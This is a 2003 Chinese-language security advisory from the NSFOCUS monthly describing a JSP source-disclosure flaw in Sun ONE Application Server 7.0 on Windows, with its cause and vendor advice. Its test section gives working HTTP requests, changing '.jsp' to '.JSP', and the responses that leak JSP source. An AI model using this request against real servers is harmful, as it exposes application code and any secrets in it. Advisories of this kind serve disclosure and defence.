首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第41期->最新漏洞
期刊号: 类型: 关键词:
Sun-One Application Server远程JSP源代码泄露漏洞

日期:2003-06-03

发布日期:2003-05-27
更新日期:2003-05-30

受影响系统:
Sun ONE Application Server 7.0
    - Microsoft Windows XP
    - Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
Sun ONE是Sun公司推出的智能Web服务的软件组合系统,其中包含Sun ONE统一开发服务器,Sun ONE应用服务器可安装在Windows和Unix操作系统上。

Sun ONE应用服务器对文件扩展名处理不正确,远程攻击者可以利用这个漏洞获得JSP脚本源代码信息,造成敏感信息泄露。

通过更改HTTP请求中文件扩展名的大小写,可查看JSP应用程序的源代码。问题是由于Unix代码移植到Microsoft Windows平台时没有考虑文件系统是大小写无关的。当系统接收到请求时,服务程序执行对".jsp"扩展名进行大小写敏感判断。如果是小写的,就使用JSP引擎处理,否则就查询文件系统中是否存在此文件。在UNIX操作系统中,如果请求"file.JSP",会由于该文件不能打开而请求失败,而在Windows中,由于大小写无关能从文件系统中获得此文件,并直接返回了该文件的源代码信息。

<*来源:SPI Labs (spilabs@spidynamics.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105409846029475&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

SPI Labs (spilabs@spidynamics.com)提供了如下测试方法:

[正确的原始请求]

GET /hello.jsp HTTP/1.0


[正确应答]

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>


[如果请求的扩展名为大写]

GET /hello.JSP HTTP/1.0

[会返回源代码信息]

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.
</body></html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sunsolve.sun.com/security
版权所有,未经许可,不得转载